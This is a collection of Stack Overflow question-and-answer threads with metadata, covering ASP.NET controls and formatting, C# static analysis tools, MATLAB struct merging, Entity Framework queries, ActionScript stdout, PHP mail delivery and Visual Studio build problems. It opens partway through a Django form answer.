class TimeSlotForm(forms.ModelForm):
start = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'HH:MM'}))
end = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'HH:MM'}))
class Meta:
model = TimeSlots
fields = ('start', 'end', 'provider')
Convert string input into time object in views.
import datetime
def slots():
if request.method == 'POST':
form = create_form(request.POST)
if form.is_valid():
slot = form.save(commit=False)
start = form.cleaned_data['start']
end = form.cleaned_data['end']
start = datetime.datetime.strptime(start, '%H:%M').time()
end = datetime.datetime.strptime(end, '%H:%M').time()
slot.start = start
slot.end = end
slot.save()
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38601",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "183"
} |
Q: Best way to display/format SQL 2005 money data type in ASP.Net I am attempting to set an asp.net textbox to a SQL 2005 money data type field, the initial result displayed to the user is 40.0000 instead of 40.00.
In my asp.net textbox control I would like to only display the first 2 numbers after the decimal point e.g. 40.00
What would be the best way to do this?
My code is below:
this.txtPayment.Text = dr["Payment"].ToString();
A: this.txtPayment.Text = string.Format("{0:c}", dr[Payment"].ToString());
A: Does the "c" format string work on ASP.NET the same way as it does in, say, Windows Forms? Because in WinForms I'm fairly certain it obeys the client's currency settings. So even if the value is stored in US Dollars, if the client PC is set up to display Yen then that's the currency symbol that'll be displayed. That may not be what you want.
It may be wiser if that's the case to use:
txtPayment.Text = dr["Payment"].ToString("00.00")
A: Use the ToString method with "c" to format it as currency.
this.txtPayment.Text = dr["Payment"].ToString("c");
Standard Numeric Format Strings
A: @Matt Hamilton
It does. "c" works for whatever the CurrentCultureInfo is, the question becomes if all the users of the web application have the same currency as the server, otherwise, they will need to get the cultureinfo clientside and use the currency gleaned from there.
A: After some research I came up with the following:
string pmt = dr["Payment"].ToString();
double dblPmt = System.Convert.ToDouble(pmt);
this.txtPayment.Text = dblPmt.ToString("c",CultureInfo.CurrentCulture.NumberFormat);
I am going to test all code samples given. If I can solve this with one line of code then thats what I am going to do.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38602",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: asp:DropDownList Error: 'DropDownList1' has a SelectedValue which is invalid because it does not exist in the list of items I have a asp.net 2.0 web site with numerous asp:DropDownList controls.
The DropDownList control contains the standard info city, state, county etc... info.
In addition to the standard codes the site also has custom codes that the users can configure themselves.
For example a animal dropdown may contain the values Dog, Cat, Fish, ect...
I am popluating the DropDownList from a SQL 2005 table that I created e.g. tblCodes
Everything works great and users are able to add orders using the numerous DropDownList controls to choose items from the list.
The problem occurrs if a user wants to change one of their custom dropdowns. For example a user would like to change the verbage
on a animal type control from Dog to K9. This is where the problem starts.
For all new orders the drop down works fine. When the user retrieved an old order
I get the following error in the C# codebehind
"'DropDownList1' has a SelectedValue which is invalid because it does not exist in the list of items."
What's happening is the old order has a database field value of Dog and the DropDownList no longer has Dog in its list since the user changed it to K9.
Any ideas on a workaround?
Is there a way to make the asp:DropDownList accept items not seeded in its list?
Is there another control I could use?
A: I solved this exact same problem just two days ago. First, I moved the code that set the SelectedValue to a PreRender handler for the DropDownList. Then, I add logic to first check to see if the value is in the drop down list. If not, I add it.
Here's my code. ddSpecialty is my drop-down list, populated with "specialties" from the database. registration.Specialty is the specialty that the user chose, which may or may not be in the drop down, since that particular specialty may have been deleted since they last chose it.
protected void ddSpecialty_PreRender(object sender, EventArgs e)
{
if (!ddSpecialty.Items.Contains(new ListItem(registration.Specialty)))
ddSpecialty.Items.Add(registration.Specialty);
ddSpecialty.SelectedValue = registration.Specialty;
}
A: I've become very fond of the following little snippet for setting DropDownList values:
For non-DataBound (eg Items added manually):
ddl.SelectedIndex = ddl.Items.IndexOf(ddl.Items.FindByValue(value));
For DataBound:
ddl.DataBound += (o,e) => ddl.SelectedIndex = ddl.Items.IndexOf(ddl.Items.FindByValue(value));
I sure do wish though that ListControls in general didn't throw errors when you try to set values to somthing that isn't there. At least in Release mode anyways it would have been nice for this to just quietly die.
A: Your SelectedValue should be a unique id of some sort, that doesn't change. The Text value that gets displayed to the user is something seperate, and can change if necessary without affecting your application, because you associate the id with your Order, not the displayed string value.
A: I'm not sure it's the same issue, but I had a similar sounding issue with trying to bind a DropDownList that I wanted to contain in a GridView. When I looked around I found a lot of people asking similar questions, but no robust solutions. I did read conflicting reports about whether you could intercept databinding, etc events. I tried most of them but I couldn'f find a way of intercepting or pre-empting the error.
I ended up creating a subclass of the ddl, intercepting the error from there hacking a fix.
Not tidy but it worked for my needs. I put the code up on my blog in case it's of help. link text
A: Check this:
http://www.codeproject.com/Tips/179184/ASP-dropdownlist-missing-value-error.aspx
A: Try this:
if (ddl.Items.Contains(new ListItem(selectedFacility)))
ddl.SelectedValue = selectedFacility;
A: Ran into this myself. Oddly, ddl.ClearSelection(); didn't work. Had to use ddl.SelectedValue = null
Also noticed, that this must come AFTER I clear the items from the list ddl.Items.Clear(); which also seems weird. Setting the SelectedValue to null, then clearing the items still threw the error.
Once this is done, re-bind the list and re-select with new value.
A: I have made a workaround after having this problem very often. Unfortunate that MS still did not recovered this issue.
Anyway, my workaround is as follows.
1) I bind the data to the ToolTip property of the DropDownList
<asp:DropDownList ID="edtDepartureIDKey" runat="server" CssClass="textbox"
ToolTip='<%# Eval("DepartureIDKey") %>' DataSource="<%# DLL1DataSource() %>" DataTextField="DisplayField" DataValueField="IDKey"
onprerender="edtDepartureIDKey_PreRender">
2) On the prerender event i check the availibilty of the data, and if it is not in the list I simply add it, then set the selectedindex to the data valuei which I saved in ToolTip property
protected void edtDepartureIDKey_PreRender(object sender, EventArgs e)
{
DropDownList ddl = (sender as DropDownList);
if (ddl.Items.FindByValue(ddl.ToolTip) == null)
{
//I am pulling Departure Data through the ID which is saved in ToolTip, and insert it into the 1st row of the DropDownList
TODepartureData v = new TODepartureData(DBSERVER.ConnStrName);
TODeparture d = v.Select(Convert.ToInt32(ddl.ToolTip));
ddl.Items.Insert(0, new ListItem(d.DeptCode, ddl.ToolTip));
}
ddl.Items.FindByValue(ddl.ToolTip).Selected = true;
}
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38612",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: LSP in OO programming? Am I right in thinking the full name of the LSP is the Liskoff Substitution Principle? I'm having trouble finding an [online] source to cite for any information on this... it seems to be a cornerstone of OOP, and yet I'm having trouble finding definitions.
A: Yes, you are right. It's spelled Liskov which is probably why you can't find a citation.
Here's the link. One of the better resources regarding this is Robert C. Martin's Agile Software Development Principles Patterns and practices book.
A: You got the name right.
http://en.wikipedia.org/wiki/Liskov_substitution_principle
It was developed by Barbra Liskov, a professor at MIT.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38618",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "0"
} |
Q: ASP.NET XML ObjectDataSource Wrapper Class Examples I want to use XML instead of SQLServer for a simple website.
Are their any good tutorials, code examples, and/or tools available to make a (prefer VB.NET) wrapper class to handle the basic list, insert, edit, and delete (CRUD) code?
The closest one I found was on a Telerik Trainer video/code for their Scheduler component where they used XML to handle the scheduling data in the demo. They created an ObjectDataSource class. Here is a LINK to that demo if anyone is interested.
[Reply to Esteban]
it would make deployment easier for clients that use godaddy where the database isn't in the app_data folder. also backing up those websites would be as simple as FTP the entire thing.
i have concerns about possible collisions on saving. especially if I add something as simple as a click counter to say a list of mp3 files visitors to the site can access.
A: In these days of SQL Server Express, I'd say there's really no reason for you not to use a database.
I know this doesn't really answer your question, but I'd hate to see you roll out code that will be a nightmare to maintain and scale.
Maybe you could tell us why you want to use XML files instead of a proper database.
A: It would make deployment easier for clients that use go-daddy where the database isn't in the app_data folder. also backing up those websites would be as simple as FTP the entire thing.
I have concerns about possible collisions on saving. especially if I add something as simple as a click counter to say a list of mp3 files visitors to the site can access.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38629",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "0"
} |
Q: What static analysis tools are available for C#? What tools are there available for static analysis against C# code? I know about FxCop and StyleCop. Are there others? I've run across NStatic before but it's been in development for what seems like forever - it's looking pretty slick from what little I've seen of it, so it would be nice if it would ever see the light of day.
Along these same lines (this is primarily my interest for static analysis), tools for testing code for multithreading issues (deadlocks, race conditions, etc.) also seem a bit scarce. Typemock Racer just popped up so I'll be looking at that. Anything beyond this?
Real-life opinions about tools you've used are appreciated.
A: The tool NDepend is quoted as Quality Metric Tools but it is pretty much also a Code violation detection tool. Disclaimer: I am one of the developers of the tool
With NDepend, one can write Code Rule over LINQ Queries (what we call CQLinq). More than 200 CQLinq code rules are proposed by default. The strength of CQLinq is that it is straightforward to write a code rule, and get immediately results. Facilities are proposed to browse matched code elements. For example:
Beside that, NDepend comes with many others static analysis like features. These include:
*
*Reporting from your CI/CD
*Azure DevOps Hub
*GitHub Action
*Smart Technical Debt Estimation
*Dependency Matrix
*Code Diff capabilities
*NDepend.API that lets write you own static analysis tool. With NDepend.APi we even developed a tool to detect code duplicate (details in this blog post: An Original Algorithm to Find .NET Code Duplicate).
*Powerful Dependency Graph
A: Code violation detection Tools:
*
*FxCop, excellent tool by Microsoft. Check compliance with .NET framework guidelines.
Edit October 2010: No longer available as a standalone download. It is now included in the Windows SDK and after installation can be found in Program Files\Microsoft SDKs\Windows\ [v7.1] \Bin\FXCop\FxCopSetup.exe
Edit February 2018: This functionality has now been integrated into Visual Studio 2012 and later as Code Analysis
*Clocksharp, based on code source analysis (to C# 2.0)
*Mono.Gendarme, similar to FxCop but with an open source licence (based on Mono.Cecil)
*Smokey, similar to FxCop and Gendarme, based on Mono.Cecil. No longer on development, the main developer works with Gendarme team now.
*Coverity Prevent™ for C#, commercial product
*PRQA QA·C#, commercial product
*PVS-Studio, commercial product
*CAT.NET, visual studio addin that helps identification of security flaws Edit November 2019: Link is dead.
*CodeIt.Right
*Spec#
*Pex
*SonarQube, FOSS & Commercial options to support writing cleaner and safer code.
Quality Metric Tools:
*
*NDepend, great visual tool. Useful for code metrics, rules, diff, coupling and dependency studies.
*Nitriq, free, can easily write your own metrics/constraints, nice visualizations. Edit February 2018: download links now dead. Edit June 17, 2019: Links not dead.
*RSM Squared, based on code source analysis
*C# Metrics, using a full parse of C#
*SourceMonitor, an old tool that occasionally gets updates
*Code Metrics, a Reflector add-in
*Vil, old tool that doesn't support .NET 2.0. Edit January 2018: Link now dead
Checking Style Tools:
*
*StyleCop, Microsoft tool ( run from inside of Visual Studio or integrated into an MSBuild project). Also available as an extension for Visual Studio 2015 and C#6.0
*Agent Smith, code style validation plugin for ReSharper
Duplication Detection:
*
*Simian, based on source code. Works with plenty languages.
*CloneDR, detects parameterized clones only on language boundaries (also handles many languages other than C#)
*Clone Detective a Visual Studio plugin (which uses ConQAT internally)
*Atomiq, based on source code, plenty of languages, cool "wheel" visualization
General Refactoring tools
*
*ReSharper - Majorly cool C# code analysis and refactoring features
A: *
*Gendarme is an open source rules based static analyzer (similar to FXCop, but finds a lot of different problems).
*Clone Detective is a nice plug-in for Visual Studio that finds duplicate code.
*Also speaking of Mono, I find the act of compiling with the Mono compiler (if your code is platform independent enough to do that, a goal you might want to strive for anyway) finds tons of unreferenced variables and other Warnings that Visual Studio completely misses (even with the warning level set to 4).
A: Have you seen CAT.NET?
From the blurb -
CAT.NET is a binary code analysis tool
that helps identify common variants of
certain prevailing vulnerabilities
that can give rise to common attack
vectors such as Cross-Site Scripting
(XSS), SQL Injection and XPath
Injection.
I used an early beta and it did seem to turn up a few things worth looking at.
A: I find the Code Metrics and Dependency Structure Matrix add-ins for Reflector very useful.
A: Aside from the excellent list by madgnome, I would add a duplicate code detector that is based off the command line (but is free):
http://sourceforge.net/projects/duplo/
A: Klocwork has a static analysis tool for C#: http://www.klocwork.com
A: Axivion Bauhaus Suite is a static analysis tool that works with C# (as well as C, C++ and Java).
It provides the following capabilities:
*
*Software Architecture Visualization (inlcuding dependencies)
*Enforcement of architectural rules e.g. layering, subsystems, calling rules
*Clone Detection - highlighting copy and pasted (and modified code)
*Dead Code Detection
*Cycle Detection
*Software Metrics
*Code Style Checks
These features can be run on a one-off basis or as part of a Continuous Integration process. Issues can be highlighted on a per project basis or per developer basis when the system is integrated with a source code control system.
A: Optimyth Software has just launched a static analysis service in the cloud www.checkinginthecloud.com. Just securely upload your code run the analysis and get the results. No hassles.
It supports several languages including C# more info can be found at wwww.optimyth.com
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38635",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "174"
} |
Q: What are some efficient ways to combine two structures in MATLAB? I want to combine two structures with differing fields names.
For example, starting with:
A.field1 = 1;
A.field2 = 'a';
B.field3 = 2;
B.field4 = 'b';
I would like to have:
C.field1 = 1;
C.field2 = 'a';
C.field3 = 2;
C.field4 = 'b';
Is there a more efficient way than using "fieldnames" and a for loop?
EDIT: Let's assume that in the case of field name conflicts we give preference to A.
A: I have found a nice solution on File Exchange: catstruct.
Without testing the performance I can say that it did exactly what I wanted.
It can deal with duplicate fields of course.
Here is how it works:
a.f1 = 1;
a.f2 = 2;
b.f2 = 3;
b.f4 = 4;
s = catstruct(a,b)
Will give
s =
f1: 1
f2: 3
f3: 4
A: I don't think you can handle conflicts well w/o a loop, nor do I think you'd need to avoid one. (although I suppose efficiency could be an issue w/ many many fields...)
I use a function I wrote a few years back called setdefaults.m, which combines one structure with the values of another structure, where one takes precedence over the other in case of conflict.
% SETDEFAULTS sets the default structure values
% SOUT = SETDEFAULTS(S, SDEF) reproduces in S
% all the structure fields, and their values, that exist in
% SDEF that do not exist in S.
% SOUT = SETDEFAULTS(S, SDEF, OVERRIDE) does
% the same function as above, but if OVERRIDE is 1,
% it copies all fields of SDEF to SOUT.
function sout = setdefaults(s,sdef,override)
if (not(exist('override','var')))
override = 0;
end
sout = s;
for f = fieldnames(sdef)'
cf = char(f);
if (override | not(isfield(sout,cf)))
sout = setfield(sout,cf,getfield(sdef,cf));
end
end
Now that I think about it, I'm pretty sure that the "override" input is unnecessary (you can just switch the order of the inputs) though I'm not 100% sure of that... so here's a simpler rewrite (setdefaults2.m):
% SETDEFAULTS2 sets the default structure values
% SOUT = SETDEFAULTS(S, SDEF) reproduces in S
% all the structure fields, and their values, that exist in
% SDEF that do not exist in S.
function sout = setdefaults2(s,sdef)
sout = sdef;
for f = fieldnames(s)'
sout = setfield(sout,f{1},getfield(s,f{1}));
end
and some samples to test it:
>> S1 = struct('a',1,'b',2,'c',3);
>> S2 = struct('b',4,'c',5,'d',6);
>> setdefaults2(S1,S2)
ans =
b: 2
c: 3
d: 6
a: 1
>> setdefaults2(S2,S1)
ans =
a: 1
b: 4
c: 5
d: 6
A: In C, a struct can have another struct as one of it's members. While this isn't exactly the same as what you're asking, you could end up either with a situation where one struct contains another, or one struct contains two structs, both of which hold parts of the info that you wanted.
psuedocode: i don't remember the actual syntax.
A.field1 = 1;
A.field2 = 'a';
A.field3 = struct B;
to access:
A.field3.field4;
or something of the sort.
Or you could have struct C hold both an A and a B:
C.A = struct A;
C.B = struct B;
with access then something like
C.A.field1;
C.A.field2;
C.B.field3;
C.B.field4;
hope this helps!
EDIT: both of these solutions avoid naming collisions.
Also, I didn't see your matlab tag. By convention, you should want to edit the question to include that piece of info.
A: Without collisions, you can do
M = [fieldnames(A)' fieldnames(B)'; struct2cell(A)' struct2cell(B)'];
C=struct(M{:});
And this is reasonably efficient. However, struct errors on duplicate fieldnames, and pre-checking for them using unique kills performance to the point that a loop is better. But here's what it would look like:
M = [fieldnames(A)' fieldnames(B)'; struct2cell(A)' struct2cell(B)'];
[tmp, rows] = unique(M(1,:), 'last');
M=M(:, rows);
C=struct(M{:});
You might be able to make a hybrid solution by assuming no conflicts and using a try/catch around the call to struct to gracefully degrade to the conflict handling case.
A: Short answer: setstructfields (if you have the Signal Processing Toolbox).
The official solution is posted by Loren Shure on her MathWorks blog, and demonstrated by SCFrench here and in Eitan T's answer to a different question. However, if you have the Signal Processing Toolbox, a simple undocumented function does this already - setstructfields.
help setstructfields
setstructfields Set fields of a structure using another structure
setstructfields(STRUCTIN, NEWFIELDS) Set fields of STRUCTIN using
another structure NEWFIELDS fields. If fields exist in STRUCTIN
but not in NEWFIELDS, they will not be changed.
Internally it uses fieldnames and a for loop, so it is a convenience function with error checking and recursion for fields that are themselves structs.
Example
The "original" struct:
% struct with fields 'color' and 'count'
s = struct('color','orange','count',2)
s =
color: 'orange'
count: 2
A second struct containing a new value for 'count', and a new field, 'shape':
% struct with fields 'count' and 'shape'
s2 = struct('count',4,'shape','round')
s2 =
count: 4
shape: 'round'
Calling setstructfields:
>> s = setstructfields(s,s2)
s =
color: 'orange'
count: 4
shape: 'round'
The field 'count' is updated. The field 'shape' is added. The field 'color' remains unchanged.
NOTE: Since the function is undocumented, it may change or be removed at any time.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38645",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "24"
} |
Q: Performance of Linq to Entities vs ESQL When using the Entity Framework, does ESQL perform better than Linq to Entities?
I'd prefer to use Linq to Entities (mainly because of the strong-type checking), but some of my other team members are citing performance as a reason to use ESQL. I would like to get a full idea of the pro's/con's of using either method.
A: ESQL can also generate some particularly vicious sql. I had to track a problem with such a query that was using inherited classes and I found out that my pidly-little ESQL of 4 lines got translated in a 100000 characters monster SQL statetement.
Did the same thing with Linq and the compiled code was much more managable, let's say 20 lines of SQL.
Plus, what other people mentioned, Linq is strongly type, although very annoying to debug without the edit and continue feature.
AD
A: Entity-SQL (eSQL) allows you to do things such as dynamic queries more easily than LINQ to Entities. However, if you don't have a scenario that requires eSQL, I would be hesitant to rely on it over LINQ because it will be much harder to maintain (e.g. no more compile-time checking, etc).
I believe LINQ allows you to precompile your queries as well, which might give you better performance. Rico Mariani blogged about LINQ performance a while back and discusses compiled queries.
A: nice graph showing performance comparisons here:
Entity Framework Performance Explored
not much difference seen between ESQL and Entities
but overall differences significant in using Entities over direct Queries
Entity Framework uses two layers of object mapping (compared to a single layer in LINQ to SQL), and the additional mapping has performance costs. At least in EF version 1, application designers should choose Entity Framework only if the modeling and ORM mapping capabilities can justify that cost.
A: The most obvious differences are:
Linq to Entities is strongly typed code including nice query comprehension syntax. The fact that the “from” comes before the “select” allows IntelliSense to help you.
Entity SQL uses traditional string based queries with a more familiar SQL like syntax where the SELECT statement comes before the FROM. Because eSQL is string based, dynamic queries may be composed in a traditional way at run time using string manipulation.
The less obvious key difference is:
Linq to Entities allows you to change the shape or "project" the results of your query into any shape you require with the “select new{... }” syntax. Anonymous types, new to C# 3.0, has allowed this.
Projection is not possible using Entity SQL as you must always return an ObjectQuery<T>. In some scenarios it is possible use ObjectQuery<object> however you must work around the fact that .Select always returns ObjectQuery<DbDataRecord>. See code below...
ObjectQuery<DbDataRecord> query = DynamicQuery(context,
"Products",
"it.ProductName = 'Chai'",
"it.ProductName, it.QuantityPerUnit");
public static ObjectQuery<DbDataRecord> DynamicQuery(MyContext context, string root, string selection, string projection)
{
ObjectQuery<object> rootQuery = context.CreateQuery<object>(root);
ObjectQuery<object> filteredQuery = rootQuery.Where(selection);
ObjectQuery<DbDataRecord> result = filteredQuery.Select(projection);
return result;
}
There are other more subtle differences described by one of the team members in detail here and here.
A: The more code you can cover with compile time checking for me is something that I'd place a higher premium on than performance. Having said that at this stage I'd probably lean towards ESQL not just because of the performance, but it's also (at present) a lot more flexible in what it can do. There's nothing worse than using a technology stack that doesn't have a feature you really really need.
The entity framework doesn't support things like custom properties, custom queries (for when you need to really tune performance) and does not function the same as linq-to-sql (i.e. there are features that simply don't work in the entity framework).
My personal impression of the Entity Framework is that there is a lot of potential, but it's probably a bit to "rigid" in it's implementation to use in a production environment in its current state.
A: For direct queries I'm using linq to entities, for dynamic queries I'm using ESQL. Maybe the answer isn't either/or, but and/also.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38647",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "18"
} |
Q: Any way to have an ActionScript 3 (Flex/AIR) project print to standard output? Is there any way to have a binary compiled from an ActionScript 3 project print stuff to stdout when executed?
From what I've gathered, people have been going around this limitation by writing hacks that rely on local socket connections and AIR apps that write to files in the local filesystem, but that's pretty much it -- it's obviously not possible with the Flash Player and AIR runtimes from Adobe.
Is there any project (e.g. based on the Tamarin code) that is attempting to implement something that would provide this kind of functionality?
A: With AIR on Linux, it is easy to write to stdout, since the process can see its own file descriptors as files in /dev.
For stdout, open /dev/fd/1 or /dev/stdout as a FileStream, then write to that.
Example:
var stdout : FileStream = new FileStream();
stdout.open(new File("/dev/fd/1"), FileMode.WRITE);
stdout.writeUTFBytes("test\n");
stdout.close();
Note: See this answer for the difference between writeUTF() and writeUTFBytes() - the latter will avoid garbled output on stdout.
A: As you say, there's no Adobe-created way to do this, but you might have better luck with Zinc, it is similar to AIR but provides real OS integration of Flash-based applications. Look though the API docs, there should be something there.
A: If you are using a debug Flash Player, you can have the Flash Player log trace messages to a file on your system.
If you want real time messages, then you could tail the file.
More info:
http://blog.flexexamples.com/2007/08/26/debugging-flex-applications-with-mmcfg-and-flashlogtxt/
mike chambers
[email protected]
A: Redtamarin seems to be able to do this (even though it's still in its infancy):
Contents of test.as:
import avmplus.System;
import redtamarin.version;
trace( "hello world" );
trace( "avmplus v" + System.getAvmplusVersion() );
trace( "redtamarin v" + redtamarin.version );
On the command line:
$ ./buildEXE.sh test.as
test.abc, 243 bytes written
test.exe, 2191963 bytes written
test.abc, 243 bytes written
test.exe, 2178811 bytes written
$ ./test
hello world
avmplus v1.0 cyclone (redshell)
redtamarin v0.1.0.92
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38651",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: Automatically floating all fields in a VFP report? I want to set all the fields and labels on a VFP7 report to Float and Stretch with overflow. I tried Using the .frx file and doing the following REPLACE but it didn't work.
Is there some other field I need to change too?
REPLACE float WITH .T. FOR objtype = 8
A: It turns out you have to set top to .F. for float to take effect, this worked:
USE report.frx
REPLACE float with .T., stretch with .T., top with .F. for objtype = 8
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38654",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: Can IIS 6 serve requests for pages with no extensions? Is there any way in IIS to map requests to a particular URL with no extension to a given application.
For example, in trying to port something from a Java servlet, you might have a URL like this...
http://[server]/MyApp/HomePage?some=parameter
Ideally I'd like to be able to map everything under MyApp to a particular application, but failing that, any suggestions about how to achieve the same effect would be really helpful.
A: You can also create an ISAPI filter that re-writes urls. The user enters a url with no extension, but the filter will interpret the request so that it does. Note that in IIS it's real easy to screw this up, so you might want to find a pre-written one. I haven't used any myself so I can't recommend a specific product that's any different than what you'd find via google, especially as I don't know your specific use case. But at least now you know what to search for.
You can also rewrite your urls using ASP.Net:
http://msdn.microsoft.com/en-us/library/ms972974.aspx
A: You can set the IIS6 to handle all requests, but the key to handle files without extensions is to tell the IIS not to look for the file.
http://weblogs.asp.net/scottgu/archive/2007/03/04/tip-trick-integrating-asp-net-security-with-classic-asp-and-non-asp-net-urls.aspx
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38661",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "1"
} |
Q: Can you modify text files when committing to subversion? I want to ran the following script on text files that are being committed:
# Send the commands H and w to ed
# ed will append newline if the file does not end in one
printf "%s\n" H w | ed -s $1
# Strip trailing whitespace
sed -i 's/[ \t]*$//g' $1
# Convert tabs to 4 spaces
sed -i -r "s/\t/ /g" $1
I see subversion has a start-commit and pre-commit hooks but I can't follow the documentation about how I could process the text files with the above script.
A: You mean change the text file before it's committed? You can (I'm not sure how), but it's generally not a good idea, as it doesn't tell the client about the change, so the local copies become void on a commit.
What I would do is block the commit (non zero exit), and give an error message as to why you don't want that revision to go through.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38664",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "3"
} |
Q: Does the PHP mail() function work if I don't own the MX record I'm not sure I'm using all the correct terminology here so be forgiving.
I just put up a site with a contact form that sends an email using the PHP mail() function. Simple enough. However the live site doesn't actually send the email, the test site does. So it's not my code.
It's a shared host and we have another site that has the same function that works perfectly, so it's not the server.
The only difference between the two is that the site that doesn't work just has the name server pointing to us and so the MX record never touches our server.
So my question is, could some one please confirm that the mail() function wont work if we don't have the MX record pointing to our server. Thanks
A: Yes. It will work just fine. I have a PHP script using the mail() function with the MX records set to Google Apps.
If the two scripts are on different hosts (it's a bit unclear from your post), then make sure that the host doesn't block some of the custom headers. I had issues with this when creating my script, but removing all but the From header fixed the problem.
A: Some hosts (Godaddy is the worst) block your use of sendmail and mail().
I generally use smtp to send emails from my php applications and with PHPMailer it's super easy. Many applications are using older versions of PHPMailer and sometimes updating it can help. It's also easy enough to add quickly to short scripts as well.
A: Hey guys thanks for the answers, it is really appreciated.
After ignoring the issue for a few months it has come up again, I did however find the answer to my problems.
Firstly, as you answers suggested, PHP and the mail() function were working as expected. The mail was getting sent.
The problem lies when the email is sent, it simply presumes that because its being sent from mydomain.com to *@mydomain.com email that the email itself is hosted on the same server, so it gets sent there instead and ignores the MX record.
OK it's a bit more complicated than that, but that is the general jist.
Edit:
Found a better version of the topic sendmail and MX records when mail server is not on web host.
A: The mail() function sends mail from the server hosting the script. Since many shared hosting providers host separate mail servers, and because the mail() function doesn't support any sort of authentication, many shared hosting providers block it.
A: If the site uses SPF, remember to include the sending site in your SPF record. For more info see here.
A: Yes, you could put in what ever you want in the 'from' field and it would still work.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38669",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "7"
} |
Q: ASP.NET controls cannot be referenced in code-behind in Visual Studio 2008 Ok, so, my visual studio is broken. I say this NOT prematurely, as it was my first response to see where I had messed up in my code. When I add controls to the page I can't reference all of them in the code behind. Some of them I can, it seems that the first few I put on a page work, then it just stops.
I first thought it may be the type of control as initially I was trying to reference a repeater inside an update panel. I know I am correctly referencing the code behind in my aspx page. But just in case it was a screw up on my part I started to recreate the page from scratch and this time got a few more controls down before VS stopped recognizing my controls.
After creating my page twice and getting stuck I thought maybe it was still the type of controls. I created a new page and just threw some labels on it. No dice, build fails when referencing the control from the code behind.
In a possibly unrelated note when I switch to the dreaded "design" mode of the aspx pages VS 2008 errors out and restarts.
I have already put a trouble ticket in to Microsoft. I uninstalled all add-ins, I reinstalled visual studio.
Anyone that wants to see my code just ask, but I am using the straight WYSIWYG visual studio "new aspx page" nothing fancy.
I doubt anyone has run into this, but have you?
Has anyone had success trouble shooting these things with Microsoft? Any way to expedite this ticket without paying??? I have been talking to a rep from Microsoft for days with no luck yet and I am dead in the water.
Jon Limjap: I edited the title to both make it clear and descriptive and make sure that nobody sees it as offensive. "Foo-barred" doesn't exactly constitute a proper question title, although your question is clearly a valid one.
A: In my case, I was working with some old web site code, which I converted to a VS2008 solution. I encountered this same problem.
For me, the fix was to right-click the Web Sites project in the Solution Explorer and select Convert to Web Application. This created designer.cs files for all pages, which did not yet have these files before.
A: The above fix (deleting the temp files) did not work for me. I had to delete the PageName.aspx.designer.cs file, then right-click my page, and choose "Convert to Web Application" from the context menu.
When Visual Studio attempted to rebuild the designer file, it encountered (and revealed to me) the source of the problem. In my case, VS had lost a reference to a DLL needed by one of the controls on my page, so I had to clean out the generated bin folders in my project.
A: you will also find .net temp files which are safe to delete here:
C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\Temporary ASP.NET Files
A: I observed this happens because of missing .designer.cs file. Following fixed this issue in my case (basically I had these files copied from VS 2005 web project to VS 2010 project): Right Click on .aspx file and select menu "Convert to Web site", this will create .designer.cs file and then it should work file.
A: In my case new asp controls I added to an existing were not being detected.
What worked for me was forcing a recompile by renaming an existing control to break the build eg: changing <asp:TextBox ID="txtTitle" runat="server" /> to <asp:TextBox ID="txtTitle2" runat="server" />
When I corrected the ID and rebuilt a new designer file was generated with the corrected ID and new controls.
A: try clearing your local VS cache. find your project and delete the folder. the folder is created by VS for what reason I honestly don't understand. but I've had several occasions where clearing it and doing a re-build fixes things... hope this is all that you need as well.
here
%Temp%\VWDWebCache
and possibly here
%LocalAppData%\Microsoft\WebsiteCache
A: Is the control that you are trying to reference inside of the repeater?
If so then you need to look them up using the FindControl method.
For example for:
<asp:Repeater ID="Repeater1" runat="server">
<ItemTemplate>
<asp:LinkButton ID="LinkButton1" runat="server">stest</asp:LinkButton>
</ItemTemplate>
</asp:Repeater>
You would need to do this to reference it:
LinkButton lb = Repeater1.FindControl("LinkButton1");
A: right click on project name and select "Clean". then, check your bin folder if it has any dll remaining. if so, delete it. that´s it. just rebuild and every thing will work fine.
A: This can also happen if the Inherits property on the source page doesn't match the class name in the code behind. Generally speaking, this would probably only happen if you copy/pasted a .ascx/.aspx file and forgot to update it.
Example:
<%@ Control AutoEventWireup="false" CodeBehind="myControl.ascx.vb" Inherits="myProject.myWrongControl" %>
The the code behind class:
Partial Public Class myControl
A: we cannot change the code when the application is running .To do so first click on the stop button on the top which will halt your application .now click on the button in design mode ,it will insert the code in .aspx.cs file ,then write the code in it
A: For me, deleting/renaming the files in the following location worked:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Temporary ASP.NET Files\myvirtualwebsite\e331e0a9
A: Check out your aspx file on errors, once I've faced with that problem
